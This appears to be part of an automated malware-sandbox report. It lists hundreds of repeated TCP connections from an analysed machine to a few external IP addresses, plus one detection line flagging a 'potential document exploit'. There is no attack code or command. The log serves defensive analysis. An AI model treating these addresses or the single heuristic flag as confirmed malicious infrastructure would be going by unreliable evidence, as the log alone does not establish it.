Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 188.114.96.6:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443

Potential document exploit detected (unknown TCP traffic)

Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.96.6:443
Source: global traffic	TCP traffic: 188.114.96.6:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.96.6:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.96.6:443
Source: global traffic	TCP traffic: 188.114.96.6:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 188.114.96.6:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.96.6:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.96.6:443
Source: global traffic	TCP traffic: 188.114.96.6:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 188.114.96.6:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.96.6:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.96.6:443
Source: global traffic	TCP traffic: 188.114.96.6:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 188.114.96.6:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.96.6:443
Source: global traffic	TCP traffic: 188.114.96.6:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 188.114.96.6:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.96.6:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.96.6:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.96.6:443
Source: global traffic	TCP traffic: 188.114.96.6:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.97.6:443
Source: global traffic	TCP traffic: 188.114.97.6:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.97.6:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.97.6:443
Source: global traffic	TCP traffic: 188.114.97.6:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 188.114.97.6:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.97.6:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.97.6:443
Source: global traffic	TCP traffic: 188.114.97.6:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 188.114.97.6:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.97.6:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.97.6:443
Source: global traffic	TCP traffic: 188.114.97.6:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 188.114.97.6:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 188.114.97.6:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.97.6:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.97.6:443
Source: global traffic	TCP traffic: 188.114.97.6:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
